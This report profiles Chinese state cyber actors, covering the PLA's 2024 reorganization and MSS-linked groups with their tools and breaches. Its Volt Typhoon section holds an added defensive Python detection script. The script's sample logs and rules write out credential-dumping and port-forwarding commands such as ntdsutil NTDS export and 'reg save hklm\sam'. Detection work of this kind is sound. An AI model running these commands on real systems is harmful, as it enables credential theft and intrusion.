The 2024 disbanding had several impactful features. First, the large SSF that was intended to streamline military functions is now a collection of independent “arms.” Second, the heads of each arm were downgraded in rank and are no longer equivalent to the heads of the other theater-grade services. Despite this demotion, they still report to the Central Military Commission (CMC), whereas previously only the head of the SSF answered directly to the CMC. Third, the information support role of the former SSF may have gained prominence. Finally, the disaggregation could be designed to more closely mirror the U.S. system, which might be seen as either a compliment or an attempt to more effectively measure Beijing’s capability versus U.S. Cyber Command (USCYBERCOM). The actual roles and responsibilities of the forces appear largely unchanged.
For those who enjoy the lines and boxes of bureaucracy, the detailed breakdown of the SSF restructuring follows: On April 19, 2024, the PLA officially disbanded the SSF and created three new arms. The heads of these arms were declared “deputy theater-level branches,” led by generals of slightly lower rank than the previous heads and lower ranks than the heads of the full services, like the PLA Army and Navy.
The three new arms are the PLA Military Aerospace Force (ASF) (created from the SSF’s Aerospace Systems Department), the PLA Information Support Force (ISF) (created from the SSF’s Electronic and Electromagnetic Systems Department), and the PLA Cyberspace Force (CSF) (created from the SSF’s Network Systems Department). A fourth is the PLA Joint Logistic Support Force (JLSF), a preexisting body reclassified as an arm that primarily oversees logistical operations. Engaging in a bit of Kremlinology-type speculation, researcher Meia Nouwens suggested in an analysis for the IISS that the order in which the arms were announced in the Ministry of National Defense’s press release might be significant. Specifically, the ASF and CSF might rank as more senior than the ISF. This alignment completes the “four services and four arms” model. While the distinction between a service and an arm is unclear, arms appear to be largely independent of the four services.
▲ Figure 1: PLA Structure Post-2024 Reorganization. Source: J. Michael Dahm, “A Disturbance in the Force: The Reorganization of People’s Liberation Army Command and Elimination of China’s Strategic Support Force,” Jamestown Foundation, China Brief, vol. 24, no. 9, April 26, 2024.
Initial analyses indicate that the roles and responsibilities of the arms will remain the same. The CSF will likely continue to conduct “defensive and offensive information operations,” including “reinforcing national cyber border defense, . . . detecting and countering network intrusions and maintaining national cyber sovereignty and information security.” Further, according to a Usanas Foundation paper by Tenzin Younten, the CSF will also conduct “electronic warfare, psychological warfare, and technical reconnaissance” operations. The ISF will likely be responsible for “build[ing] a network information system that fulfils the [PLA’s] requirements of modern warfare” and will oversee “informational warfare.” The reasons for this rapid reorganization are far more interesting and tell a potential story of corruption and weakness. They broadly fall into the categories of operational efficiency, a rise in prominence of these functions, or corruption crackdowns. The last of the three is the most likely explanation, but the following paragraphs will address each theory in turn.
Operational efficiency could conceivably be the main reason for the reorganization, but the evidence is thin. In an article for The Diplomat, Ying Yu Lin and Tzu-Hao Liao write that the SSF’s mandate encompassed a wide range of fields, including information and communications technology, aerospace, cyber operations, and electronic warfare. This range, combined with the SSF’s decentralization, caused the service to “spread [itself] thin, with individual units vying for resources.” Further, the model of incorporating everything into the SSF also led to redundancies and “overlapping organizational structures [that] impeded operational efficiency.” For instance, the SSF’s Aerospace Department “managed backend systems for space-related [systems and] equipment development.” However, these were also overseen by the SSF’s Equipment Development Department and certain bodies within the PLA Rocket Force and Air Force. This may all be true, but it is hard to see how demotions and reorganization solve any of these problems. Improved operational efficiency may have been a side effect of the reorganization rather than its purpose.
Another option is that this restructuring occurred to further separate and prioritize the cyber, space, and information domains within the PLA. For instance, while the ASF and CSF likely retained much of their structures from their SSF predecessors, the entirely new ISF was created primarily to support general PLA activities. Therefore, Nouwens argues that in creating the ISF, Xi “likely thinks that the ‘information support’ function requires greater prominence,” particularly at the “inter-service and inter-theatre levels.” In his Usanas Foundation paper, Younten partially supports this assessment by noting that the restructuring transformed the SSF “from a subordinate organization to a fully-fledged independent armed forces with enhanced capabilities, operational status, and resources.” This shift may indicate a growing prioritization of these domains within the armed forces. Lin and Liao partially concur: The 2024 “restructuring aims to enhance the PLA’s capabilities in an era increasingly defined by information warfare and cyber operations.” At best, however, there is a mixed message regarding prominence. Demoted leadership suggests less priority is placed on these missions, but direct reporting to the CMC might suggest a higher priority, at least for centralizing these functions.
The third explanation is far more likely: a corruption purge. Two commanders disappeared after the reorganization and have not resurfaced. The former SSF commander, General Ju Qiansheng, and the former SSF deputy commander, Lieutenant General Shang Hong, have not been reshuffled into the PLA structure and have “largely disappeared from public view,” according to Nouwens. This could also explain why Xi sought to ensure the new leaders of these arms were of lower rank than the full theater-grade generals of the services, while still maintaining direct oversight over them through the CMC, which he chairs. However, this remains impossible to confirm and is entirely speculative.
▲ Figure 2: Chinese Cyber Actors. Source: CSIS research.
The true impact of this reorganization may not be revealed for years, or perhaps ever, if none of these units ever find themselves in conflict. The CCP does experiment with organization, which is made easier by a centralized, authoritarian system. However, reorganizations are disruptive, whether in a democracy or an autocracy, and this one could present opportunities to China’s rivals.
PLA Cyber Units
The PLA has known military cyber units, primarily Comment Panda and Putter Panda, though much of the information surrounding both groups remains heavily guarded as state secrets. There is also the PLA’s “Three Warfares Base,” also known as Base 311 (311 jidi), which is headquartered in Fujian Province. According to the Taiwan Link, this base primarily focuses on “strategic psychological operations and propaganda directed against Taiwan.”
Cybersecurity firm Mandiant and Thailand’s Electronic Transactions Development Agency (ETDA) believe Comment Panda and Putter Panda were engaged in cyber espionage as early as 2006 and 2007, respectively, making them some of the earliest known Chinese cyber units. Comment Panda, in particular, is considered by Mandiant to be “one of the most prolific [Chinese] cyber espionage groups in terms of the sheer quantity of information stolen,” although the full extent of its theft remains unknown. Furthermore, because these PLA units are believed to “receive direct government support,” they are thought to be among the largest and best-funded Chinese cyber units. Both APTs appear to be headquartered in Shanghai.
Both Comment Panda and Putter Panda likely fall under the newly formed CSF. This is because, prior to the establishment of the SSF in 2015, both groups were part of the PLA’s 3rd General Staff Department (3PLA). Following the PLA’s 2015 reorganization, which created the SSF, 3PLA—along with elements of other General Staff Departments (mainly 2PLA and 4PLA)—was merged into the Network Systems Department of the SSF, the precursor to the current Cyberspace Force. According to the IISS and the Usanas Foundation, many components of the SSF’s Network Systems Department were subsumed into the newly formed Cyberspace Force in 2024, which could mean that both Comment Panda and Putter Panda now fall under the Cyberspace Force. However, this remains nearly impossible to publicly verify.
A 2024 report by cybersecurity firm Sekoia.io found a notable decline in reported PLA hacking operations since 2017. This trend is attributed to the growing role of the MSS as China’s main body for IP theft and the PLA being “retasked to directly support military operations,” according to a piece in Lawfare. Sekoia.io’s 2024 report also notes that PLA operations increasingly target military and government organizations, prioritizing long-term persistence and stealth—factors that may explain why recent PLA hacking activities remain undiscovered. Additionally, Sekoia.io observes that many of the PLA’s targets—such as military and government organizations—are reluctant to disclose incidents in which they have been successfully hacked, further contributing to the lack of public reports on PLA-related hacking. Despite this, the report concludes it is unlikely that PLA hacking activities have diminished; rather, they have likely evolved and become more covert.
COMMENT PANDA
▲ Table 1: Aliases of Comment Panda
Comment Panda was first active in 2006 and is believed to be among the largest and best-funded of China’s cyber units. Mandiant estimates that Comment Panda “is staffed by hundreds, and perhaps thousands of people.” According to Tom Uren of the Australian Strategic Policy Institute (ASPI), this estimate is based on several factors: the size of Comment Panda’s compound in Shanghai’s Pudong New Area (estimated by Mandiant at 130,663 square feet and 12 stories), the number of “concurrent operations” the group has carried out, and the overall volume of its cyber activities since 2007. If this estimate is accurate, it could put the group on par with USCYBERCOM in terms of personnel size (USCYBERCOM is estimated to have approximately 6,200 civilian and military staff). Furthermore, Comment Panda has its own dedicated fiber-optic communications infrastructure built by China Telecom. Mandiant formally attributed the group to PLA Unit 61398, a secretive military hacking unit that was the Second Bureau of the 3PLA before the 2015 reorganization.
Comment Panda primarily targets U.S. companies and organizations and has stolen “hundreds of terabytes of data” from 141 organizations, most of them in the United States, since 2006, according to the USCC. During this time, the group stole “technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, [company] emails, contact lists,” primarily targeting the “nuclear power, metals, and solar” industries, likely to benefit Chinese state-owned enterprises. To support its operations, Mandiant estimates that Comment Panda has “hundreds, and perhaps thousands of people . . . [including] linguists, open-source researchers, malware authors, [and] industry experts,” in addition to facility and logistical staff. Mandiant also conservatively estimates that the group operates an attack infrastructure of “over 1,000 servers.”
The group primarily targets the IT, aerospace, telecommunications, and energy industries, along with other sectors China has identified as “strategic to [its] growth.” These include four of the seven “strategic emerging industries” highlighted in China’s 12th Five-Year Plan. Comment Panda is known for using spear-phishing emails containing malicious attachments to create custom back doors into its victims’ systems as well as for deploying malware such as TROJAN.ECLTYS, BACKDOOR.BARKIOFORK, and BACKDOOR.WAKEMINAP.
Comment Panda is responsible for the following notable cyberattacks:
- In May 2014, DOJ charged five “military hackers” affiliated with Comment Panda with conducting cyber espionage campaigns against Westinghouse Electric Company; the U.S. subsidiaries of SolarWorld; the United States Steel Corporation; Allegheny Technologies; the United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied Industrial and Service Workers International Union; and the Alcoa Corporation. This operation is believed to have taken place between 2006 and 2014, and the 2014 DOJ indictment marked the first time the United States filed criminal charges against named foreign state actors for cyber espionage.
- Comment Panda has been accused of stealing “hundreds of terabytes of data” from 141 organizations across 20 industries as part of a broader espionage campaign that spanned from 2006 to 2013.
PUTTER PANDA
▲ Table 2: Aliases of Putter Panda
Cyber activity linked to Putter Panda was identified as early as 2007. According to the USCC, the group is affiliated with PLA Unit 61486, formerly part of the 12th Bureau of the 3PLA. Headquartered in Shanghai, Putter Panda primarily targets non-U.S. Western countries (though it has occasionally targeted U.S. companies) and has been known to conduct cyber espionage targeting the “satellite, aerospace, and communications industries to support China’s space surveillance network.” Putter Panda’s previous supervising body, 3PLA, was sometimes referred to as China’s “National Security Agency” and was believed to be responsible for electronic intelligence, cyber reconnaissance, and signals intelligence collection for the PLA. This background likely explains Putter Panda’s focus on targeting foreign satellite, aerospace, and communications industries.
CrowdStrike noted that Putter Panda has a close working relationship with students from the School of Information Security Engineering at Shanghai Jiao Tong University (SJTU) and actively recruits them to “conduct network offense and defense campaigns.” Putter Panda is also reportedly “staffed in part by current or former [SJTU] students.” The group typically uses spear-phishing emails and has been known to exploit the CVE-2012-0158 vulnerability in Microsoft Office and deploy MOOSE and WARP690 malware, according to MITRE and the USCC.
Putter Panda was responsible for the following notable cyberattack:
- In June 2014, CrowdStrike investigators discovered that Putter Panda was conducting spear-phishing attacks to target attendees of space technology conferences. In one attack, the group sent fake emails inviting attendees to a yoga studio in Toulouse, France, along with malware-infused attachments disguised as conference-related information. Putter Panda also reportedly sent infected documents posing as job opportunities to lure additional victims.
Intelligence and Civilian Bodies
Civilian agencies also play a key role in China’s cyber operations. Beijing leverages a combination of government security services and ostensibly private front companies to advance its foreign policy objectives. Key among these agencies is the MSS, which serves as China’s primary foreign intelligence agency; the MPS, which focuses mostly on domestic surveillance; and the CAC, which serves as China’s central cyber regulator and oversees internet control and censorship. While not much is known about the MPS’s cyber units, the MSS operates a vast array of affiliated cyber units, each with varying specializations and expertise.
MINISTRY OF STATE SECURITY (MSS)
The MSS is China’s main civilian intelligence service and is often likened to a combination of the United States’ FBI and Central Intelligence Agency (CIA). Responsible for counterintelligence, political security for the CCP, and foreign, industrial, and cyber espionage, the MSS is behind some of China’s most high-profile cyberattacks, including operations targeting the United States. According to Peter Mattis, a long-time China expert and former analyst in the CIA’s counterintelligence center, the MSS’s hacking activities are less well-known than the PLA’s because they are “more skilled and much better at hiding their tracks.”
The MSS conducts cyber operations to gather various types of intelligence, including foreign, military, and commercial information. CISA highlights that MSS-affiliated cyber actors often “us[e] publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. government agencies.” For example, Chinese MSS-affiliated cyber threat actors often “use open-source information to plan and conduct cyber operations . . . [and] use readily available exploits and exploit toolkits to quickly engage target networks.”
The MSS frequently hires contract hackers, often working through front companies, to conduct offensive cyber activities, infiltrate critical infrastructure, and steal IP. According to a March 2024 U.S. Treasury Department sanctions designation, Judgment Panda—a group believed to be linked to the Hubei State Security Department (HSSD)—is “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff that conduct malicious cyber operations on behalf of the [HSSD].” This suggests that other MSS-affiliated APTs may also consist of a similar mix of contract hires, intelligence officers, and support staff connected to the MSS. Intrusion Truth, a mysterious group known for exposing suspected Chinese cyber espionage operations, supports this assessment, noting that its “original blueprint for an APT in China requires: contract hackers and specialists, front companies, and an intelligence officer.”
Further, the MSS also operates through numerous subordinate branches at the provincial, city, municipality, and township levels, each wielding significant degrees of authority. However, the MSS “exercises coordination and leadership” over these lower levels of bureaucracy and oversees the country’s “network of regional agencies.” Notably, provinces in China have their own MSS department (SSD) or bureau (SSB), each functioning as a regional government agency and integrated into the national state security system. This sharply contrasts with the intelligence community in the West, where international intelligence operations are often under the sole authority of the central government.
According to Joske, “the vast majority of China’s state security personnel are working in these provincial agencies [and] by extension, probably carry out the majority of foreign intelligence operations.” This might also explain why “no cyber-attacks have been publicly attributed to the central MSS” in Beijing, while many attacks have been linked to APTs affiliated with MSS regional bodies at the provincial or municipality level (most notably the Sichuan, Guangdong, Hainan, Shandong, and Tianjin Security Departments and Bureaus). The PLA’s military intelligence is structured similarly, though its operations are organized by “regional theater command rather than province.”
Many of these regional bodies have specialized areas of focus. For example, the Zhejiang State Security Department focuses on “operations targeting Europe,” while the Fuzhou branch of the MSS is dedicated to gathering intelligence on Taiwan. Other provinces have technical expertise, such as Jiangsu, which is home to the Nanjing Institute of Information Technology, a large MSS research unit. Additionally, provincial state security agencies under the MSS often recruit locally, which likely creates a correlation between the strength of a province’s cyber capabilities and its proximity to highly ranked Chinese universities. According to Joske, “the exact . . . reasons for different specialisations [at the provincial level] generally remains unclear, and it is not known how the MSS coordinates and controls provincial agencies.”
Notable MSS-affiliated groups involved in these operations include Stone Panda, Deep Panda, Vanguard Panda (Volt Typhoon), Salt Typhoon, Judgment Panda, Kryptonite Panda, Wicked Panda, Gothic Panda, and Ethereal Panda.
STONE PANDA
▲ Table 3: Aliases of Stone Panda
Stone Panda is an APT that has been active since at least 2006. The group typically targets construction, engineering, aerospace, and telecommunications firms, as well as foreign governments, with the goal of “acquiring valuable military and intelligence information” and stealing trade secrets to support Chinese businesses, according to Mandiant. Symantec also reported that Stone Panda has historically targeted Japanese corporations and media organizations, likely for similar reasons. The group is best known for using spear phishing and for gaining access to victims’ networks through managed service providers (MSPs). The group has been known to use the HAYMAKER, SNUGRIDE, and BUGJUICE malware tools. Stone Panda has also been known to customize versions of the open-source QUASARRAT malware, using it as a second-stage back door in its attacks.
In an indictment of two Stone Panda hackers, DOJ linked the group to the Tianjin State Security Bureau, a municipal division of the MSS. Stone Panda is also believed to operate through the Huaying Haitai Science and Technology Development Company, a front company affiliated with the MSS.
Stone Panda is responsible for the following notable cyberattacks:
- Stone Panda’s most notorious attack is the 2016 Cloud Hopper Operation, a hacking campaign that used spear phishing to infiltrate multiple MSPs. Once in their systems, the group would “hop” into the MSPs’ client networks, stealing vast amounts of corporate IP and government secrets. High-profile targets included IBM, Hewlett Packard, NASA, Ericsson, Sabre, Huntington Ingalls Industries (HII), and several unnamed U.S. government agencies.
- Stone Panda is also believed to have played a key role in the “Technology Theft Campaign,” a long-running operation that began in 2006. During this campaign, the group gained access to the computers “of more than 45 technology companies,” stealing “hundreds of gigabytes of sensitive data.” The campaign primarily targeted companies in aviation, space, communications, advanced manufacturing, maritime technology, and oil and gas—all sectors highlighted in the CCP’s Made in China 2025 plan to boost China’s domestic tech industry and reduce its reliance on foreign companies.
- According to cybersecurity company ESET, Stone Panda carried out Operation LiberalFace, a spear-phishing campaign in 2022 that targeted Japanese political entities and an unnamed Japanese political party. This operation occurred in the weeks leading up to Japan’s House of Councilors election in July 2022.
DEEP PANDA
▲ Table 4: Aliases of Deep Panda
Deep Panda is responsible for some of China’s most invasive and large-scale cyber espionage campaigns. Deep Panda has been active since 2013 and primarily targets technology companies, U.S. defense contractors, nongovernmental organizations, and federal departments and agencies, likely for espionage purposes. Deep Panda is known for breaching companies’ defenses through customized spear-phishing emails, utilizing various malware tools such as C0d0so0, Cobalt Strike, Derusbi, EmpireProject, and Fire Chili, as well as exploiting a zero-day vulnerability in Adobe Flash. Reports also suggest that Deep Panda has used malware created during student hacking competitions in China. While Deep Panda is believed to be affiliated with the MSS, the specific SSB or SSD to which the group is connected is unknown.
The group is responsible for the following notable cyberattacks:
- In February 2014, Deep Panda launched a phishing attack on employees at Anthem Blue Cross, successfully exfiltrating approximately 78.8 million members’ medical records, including names, birth dates, Social Security numbers, phone numbers, email and home addresses, and patient financial data. According to The Record and the Washington Post, the malware used in this attack was likely developed during the 2014 TOPSEC Cup, a student hacking competition sponsored by Southeast University’s Information Security Research Center in Nanjing and the Beijing Topsec Network Security Technology Company, a defense contractor partially funded by the PLA. According to ThreatConnect analysts quoted by Healthcare Finance News, the MSS may have hacked Anthem “for the purposes of gathering sensitive information for follow-on (human intelligence) targeting via blackmail [and] asset recruitment.”
- In June 2015, Deep Panda breached OPM, stealing 21.5 million Social Security numbers, including 19.7 million from Americans who had applied for a U.S. security clearance. Later that year, the group also hacked United Airlines, compromising an undisclosed amount of personal travel records.
- In February 2015, Deep Panda exploited a zero-day vulnerability in Adobe Flash to compromise the web servers of Forbes magazine. However, there was no evidence of successful data exfiltration in this breach.
VANGUARD PANDA (VOLT TYPHOON)
▲ Table 5: Aliases of Vanguard Panda
Vanguard Panda, more commonly known as Volt Typhoon, is a relatively new APT, first active in 2021, although some have suggested that activity in 2019 should also be attributed to the group. It is known for secretly embedding itself in critical infrastructure sectors such as “communications, manufacturing, utilities, transportation, construction, maritime, government, and information” systems—often remaining undetected for months, or even years. Volt Typhoon has targeted networks in Australia, India, and the United Kingdom but is perhaps best known for its attacks on U.S. critical infrastructure. To date, the group has successfully breached infrastructure in Guam, as well as “water treatment plants, water wells, electrical substations, OT Systems, and network security systems” across the United States.
According to Microsoft, the group is developing “capabilities that could disrupt critical communications infrastructure between the United States and Asia.” Additionally, Eric Goldstein, a former senior CISA official, told Reuters that most of Volt Typhoon’s identified targets, such as mass transit systems or water treatment facilities, “have no legitimate espionage value,” suggesting that the group’s true objective may be sabotage. Volt Typhoon almost certainly has been “pre-positioning” itself to attack U.S. systems in the event of a “hot” conflict between China and the United States.
In response, U.S. government officials have issued advisory warnings, including a joint statement on February 7, 2024, by then-FBI Director Christopher Wray and then-National Cyber Director Harry Coker. Coker warned that Volt Typhoon’s efforts are designed to “disrupt [the U.S.] military’s ability to mobilize,” while Wray stated that the group is preparing to “wreak havoc and cause real-world harm to American citizens and communities if and when China decides the time has come to strike.”
According to CrowdStrike and The Guardian, Volt Typhoon uses living-off-the-land (LOTL) techniques to remain hidden. This method involves using legitimate, often native tools already present within the victim’s operating system to carry out the attack, which significantly complicates detection, especially when used with stolen valid credentials obtained through phishing. Volt Typhoon tries to “blend into normal network activity by routing traffic through compromised small office and home office (SOHO) equipment, including routers, firewalls, and VPN hardware.” The group is known to use customized versions of open-source malware tools and Fast Reverse Proxy tunneling tools to breach firewalls and covertly sign into systems. While it is widely believed that Volt Typhoon is affiliated with the MSS, there is no definitive information on which specific provincial subunit of the MSS oversees the group.
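The detection difficulty described above comes from the fact that the binaries involved are legitimate: what distinguishes abuse is the command-line context, the parent process and the account running it, not the tool itself. The following added example, written for this page and not taken from the report or from any vendor, shows that approach over a handful of constructed Windows process-creation log lines. The log lines, host names and account names are constructed, and the indicator patterns (port forwarding with netsh, exporting the NTDS database or registry credential hives, remote execution via wmic, encoded PowerShell, a web-server worker spawning a shell) are commonly cited native-tool abuse patterns chosen here as an assumption, not indicators the report attributes to Volt Typhoon.

```python
"""Flag living-off-the-land (LOTL) activity in process-creation logs.

Added example for this page, not code from the report. Everything below
(log lines, hosts, accounts, the indicator list) is constructed or assumed.
"""
import re
from dataclasses import dataclass

# Constructed Sysmon-style process-creation events, key=value with quoted values.
LOG_LINES = [
    r'ts=2024-01-15T02:13:07Z host=FW-EDGE-01 user=svc_backup parent=cmd.exe image=netsh.exe cmdline="netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.8.12 connectport=8443"',
    r'ts=2024-01-15T02:14:41Z host=DC-01 user=svc_backup parent=cmd.exe image=ntdsutil.exe cmdline="ntdsutil ac i ntds ifm create full C:\Windows\Temp\pro q q"',
    r'ts=2024-01-15T09:02:10Z host=WS-102 user=CORP\it.admin parent=cmd.exe image=reg.exe cmdline="reg save hklm\sam C:\Windows\Temp\sam.hiv"',
    r'ts=2024-01-15T11:40:55Z host=WEB-03 user=IIS_POOL\DefaultAppPool parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"',
    r'ts=2024-01-15T11:41:03Z host=WS-210 user=CORP\it.admin parent=cmd.exe image=netsh.exe cmdline="netsh advfirewall show allprofiles"',
    r'ts=2024-01-15T11:45:12Z host=WS-044 user=CORP\alice parent=explorer.exe image=powershell.exe cmdline="powershell.exe -File C:\scripts\inventory.ps1"',
]


@dataclass
class Event:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# key=value pairs; a quoted value may contain spaces and further '=' signs.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Event:
    """Parse one key=value log line into an Event (process names lowercased)."""
    fields = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in KV.finditer(line)}
    return Event(fields["ts"], fields["host"], fields["user"],
                 fields["parent"].lower(), fields["image"].lower(), fields["cmdline"])


# (name, regex applied to the lowercased, whitespace-normalised command line, weight).
# Assumed indicator set of commonly abused native tools, not a list from the report.
RULES = [
    ("portproxy_forward", r"\bnetsh\b.*\binterface\b.*\bportproxy\b.*\badd\b", 4),
    ("ntds_dump", r"\bntdsutil\b.*\bifm\b", 5),
    ("cred_hive_export", r"\breg(\.exe)?\b.*\bsave\b.*\bhklm\\(sam|system|security)\b", 5),
    ("wmic_remote_exec", r"\bwmic\b.*\bprocess\b.*\bcall\b.*\bcreate\b", 3),
    ("encoded_powershell", r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", 3),
]

ADMIN_ACCOUNTS = {r"CORP\it.admin"}  # constructed baseline: accounts expected to run admin tooling
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def score_event(ev: Event) -> tuple[int, list[str]]:
    """Additive score: tool-abuse patterns plus context (parent process, account)."""
    score, reasons = 0, []
    cmd = " ".join(ev.cmdline.split()).lower()
    for name, pattern, weight in RULES:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(name)
    # A web-server worker spawning an interactive shell is rarely legitimate.
    if ev.parent in WEB_WORKERS and ev.image in SHELLS:
        score += 3
        reasons.append("web_worker_spawned_shell")
    # Admin tooling from an account outside the baseline raises the score further.
    if reasons and ev.user not in ADMIN_ACCOUNTS:
        score += 2
        reasons.append("unexpected_account")
    return score, reasons


def triage(lines: list[str], threshold: int = 4) -> list[dict]:
    """Return events scoring at or above the threshold, highest score first."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"host": ev.host, "user": ev.user, "score": score,
                             "reasons": reasons, "cmdline": ev.cmdline})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in triage(LOG_LINES):
        print(f"{f['score']:>2} {f['host']:<11} {f['user']:<24} {', '.join(f['reasons'])}")
```

The scoring is deliberately additive: a single native binary is rarely enough to alert on, but a credential-store export by an account that never performs administration, or a shell spawned by a web-server worker, is. The baseline of which accounts and parents legitimately run these tools (the `ADMIN_ACCOUNTS` set here) is what keeps the false-positive rate of this kind of detection manageable; in the constructed sample, the routine firewall query and the scheduled inventory script score zero.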
The group is responsible for the following notable cyberattack:
- In December 2023, Lumen Technologies uncovered the “KV-botnet,” a botnet likely developed by Volt Typhoon. According to the January 2024 DOJ indictment, most of the compromised devices were outdated Cisco and NetGear routers that had reached “end of life” status, meaning they no longer received security patches or updates. This vulnerability allowed Volt Typhoon hackers to infiltrate SOHO routers, firewalls, and VPNs across the United States and embed themselves into the networks of multiple critical infrastructure sectors, including “aviation, rail, mass transit, highway, maritime, pipeline, water and sewage organizations.” Although it is unclear how long Volt Typhoon has been embedded in U.S. networks, some U.S. intelligence officials believe the group has maintained quiet access and footholds within U.S. IT systems for “at least five years.” This suggests the group may have actually been active as early as 2019.
KRYPTONITE PANDA
▲ Table 6: Aliases of Kryptonite Panda
Kryptonite Panda has been active since 2013 and is affiliated with the Hainan State Security Department, a provincial branch of the MSS. The group is primarily known for targeting naval defense contractors to support China’s naval modernization efforts. Kryptonite Panda has also targeted research institutions, private companies, and government entities across the aviation, government, defense, healthcare, and biopharmaceutical sectors, mostly in the United States, Canada, the Middle East, and Western Europe. The main objective of these attacks is believed to be the theft of IP and proprietary research to reduce R&D costs for Chinese businesses.
According to CISA and the USCC, Kryptonite Panda primarily uses spear phishing to target internet-facing routers and VPNs. The group has also been known to use over 51 different malware families, including BADSIGN, FIELD GOAL, and FINDLOCK, and it employs LOTL techniques similar to those used by Volt Typhoon. Kryptonite Panda is believed to operate through the Hainan MSS-affiliated front company Hainan Xiandun Technology Development Company, which it has used to conduct cyber espionage campaigns targeting universities and to steal proprietary research related to infectious diseases.
Furthermore, in 2021, The Record and the USCC linked Kryptonite Panda to the HAFNIUM group (also known as Silk Typhoon). This connection seems plausible, as both groups operate out of Hainan and are heavily involved in industrial espionage.
The group is responsible for the following notable cyberattacks:
- In September 2017, Proofpoint detected spear-phishing emails, allegedly sent by Kryptonite Panda, targeting U.S. shipbuilding companies and universities. The emails posed as fake internship applications containing malicious files and attachments. While the targeted shipbuilding companies were not named, the Wall Street Journal reported that over 27 universities in the United States, Canada, and Southeast Asia were targeted, including the University of Hawaii, the University of Washington, the Massachusetts Institute of Technology, Pennsylvania State University, and Duke University. These attacks are widely believed to have targeted university research laboratories receiving funding from DOD.
- In July 2021, DOJ charged four members of Kryptonite Panda with hacking and stealing IP from the “aviation, defense, education, government, health care, biopharmaceutical and maritime” industries between 2011 and 2018. The stolen trade secrets included technologies related to submersibles, autonomous vehicles, chemical formulas, aircraft, and “proprietary genetic-sequencing technology and data.” The group also notably targeted research universities, exfiltrating infectious disease research on Ebola, MERS, HIV/AIDS, Marburg, and tularemia. According to the indictment, the aim was to help Chinese companies bypass “lengthy and resource-intensive research and development processes.”
- If Kryptonite Panda is indeed the same group as HAFNIUM, it would also be responsible for the infamous 2021 Microsoft Exchange Server hack, which compromised more than 30,000 servers in the United States and hundreds of thousands of other servers worldwide.
WICKED PANDA
▲ Table 7: Aliases of Wicked Panda
Wicked Panda has been active since 2012 and is affiliated with the Sichuan branch of the MSS. A prolific APT, the group has targeted over 100 organizations across 14 countries. According to a DOJ indictment, the group has been accused of stealing “source code, software code signing certificates, [and] customer account data” from IT, telecommunications, social media, and video game companies, as well as from “non-profit organizations, universities, think tanks, and foreign governments, . . . [and] pro-democracy politicians and activists in Hong Kong.”
Wicked Panda primarily employs “spear-phishing, . . . credential stealers, keyloggers, and rootkits” in its attacks. The group has also been involved in ransomware and cryptojacking schemes, which hijack victims’ devices to mine cryptocurrency. According to Demian Ahn, a former assistant U.S. attorney, Wicked Panda has significant resources at its disposal, including “tens of thousands of machines [running] at one time.” FireEye Threat Intelligence has also linked Wicked Panda to another group, Vixen Panda (APT15), due to their use of similar tools and digital certificates, although this remains difficult to confirm.
The group is responsible for the following notable cyberattacks:
- In May 2021, Wicked Panda launched a months-long campaign exploiting zero-day vulnerabilities in the USAHerds application (CVE-2021-44207) and the Log4j framework (CVE-2021-44228). This quiet but effective cyber espionage operation, which ran from May 2021 to February 2022, successfully compromised at least six U.S. state government networks and harvested an undisclosed quantity of user credentials.
- In December 2022, Wicked Panda hackers were accused of stealing over $20 million in U.S. Covid-19 relief benefits, including Small Business Administration loans and unemployment insurance funds across 12 U.S. states, according to the U.S. Secret Service. The Secret Service also suggested that the operation may have targeted all 50 states. This marked the first time the United States publicly acknowledged a case of foreign, state-sponsored pandemic fraud.
JUDGMENT PANDA
▲ Table 8: Aliases of Judgment Panda
Judgment Panda has been active since 2016 and is affiliated with the Hubei State Security Department. According to a Treasury Department indictment, the group consists of “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff.” The group is believed to operate through Wuhan Xiaoruizhi Science and Technology Company Limited (Wuhan XRZ), a front company sanctioned by the U.S. Department of the Treasury.
Judgment Panda primarily engages in cyber espionage, targeting U.S. government officials, including high-ranking advisers, White House national security staff, and U.S. government personnel from the Departments of Justice, Commerce, Treasury, and State. The group has also targeted both Democratic and Republican members of Congress, political campaign staffers, and individuals involved in the 2020 Trump and Biden campaigns. Similar to Kryptonite Panda, Judgment Panda has conducted cyberattacks against universities with ties to DOD and organizations in the financial sector.
Judgment Panda has also carried out cyber espionage campaigns against dissidents living abroad and other individuals and organizations the CCP perceives as threats. According to CyberScoop, the group monitored “thousands of U.S. and Western politicians, foreign policy experts, academics, journalists and democracy activists . . . ‘perceived as being critical of PRC government policies.’” Judgment Panda has also targeted the family members of dissidents through malicious emails and tracking links to gather information on their locations, IP addresses, and online activities. The group has primarily exploited vulnerabilities in applications like Java and Adobe Flash and is known to use a variety of malware, including SOGU, LUCKYBIRD, SLOWGYRO, and DUCKFAT. Judgment Panda frequently employs remote access trojans (RAT) such as 9002, Gh0st RAT, Sakula RAT, and Trochilus to gain access to its victims’ systems.
The group is responsible for the following notable cyberattacks:
- In March 2022, Judgment Panda targeted an undisclosed number of Gmail accounts associated with U.S. government personnel. The group used sophisticated credential-phishing emails and emails containing tracking links to target the personal accounts of campaign staffers. The likely purpose of the attack was espionage and information gathering.
